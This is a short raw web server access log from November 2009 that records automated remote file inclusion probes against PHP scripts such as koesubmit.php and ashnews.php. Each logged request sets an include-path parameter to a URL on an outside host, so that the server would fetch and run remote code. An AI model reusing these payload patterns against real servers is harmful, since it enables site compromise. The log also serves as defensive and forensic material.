200.91.8.66 - - [01/Nov/2009:02:25:00 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
61.47.7.71 - - [01/Nov/2009:02:25:03 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:02:25:03 -0500] "GET /logs/error_log.Q109070400//ashnews.php?pathtoashnews=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:02:25:03 -0500] "GET //ashnews.php?pathtoashnews=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
78.110.50.121 - - [01/Nov/2009:02:25:17 -0500] "GET /logs/access_log.Q109100700%20%20/////?_SERVER[DOCUMENT_ROOT]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
78.110.50.121 - - [01/Nov/2009:02:25:17 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
